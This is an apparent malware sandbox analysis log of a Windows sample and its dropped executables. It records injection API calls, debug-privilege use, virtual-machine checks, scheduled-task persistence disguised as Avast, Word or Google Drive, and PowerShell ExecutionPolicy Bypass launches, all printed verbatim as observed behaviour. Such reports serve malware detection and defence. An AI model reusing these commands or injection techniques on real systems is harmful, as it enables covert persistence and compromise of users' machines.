Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V Hypervisor Root Partition
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll passwordFormat="Hashed"
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor~8
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual Processorl(R)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exe	Process token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exe	Process token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\ptKNiAaGus.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ptKNiAaGus.exe, IPlSSVquzizB.cs	Reference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.gTPIGMjoKzHn()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.WonKffqJoEpSsUk()), typeof(xkmuEWGEmcLRyMY.OpenProcess), ref Parameters)
Source: ptKNiAaGus.exe, IPlSSVquzizB.cs	Reference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.DWZXpvweMZwNY()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.BzDdWBETxCu()), typeof(xkmuEWGEmcLRyMY.NtProtectVirtualMemory), ref Parameters)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.cs	Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exe	Process created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>40atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>41atus<@>Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>41atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Pong<@>40atus<@>Program Manager
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpi@.g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager /b !g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerTcpip_{AC25AD1E-4879-4C9B-BB59-E50724EBEC23}\Device\Tcpip_{60B2689F-C8F6-4D1B-8ED3-6BD4DA58F33E}\Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}Mo

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Queries volume information: C:\Users\user\Desktop\ptKNiAaGus.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe	Queries volume information: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
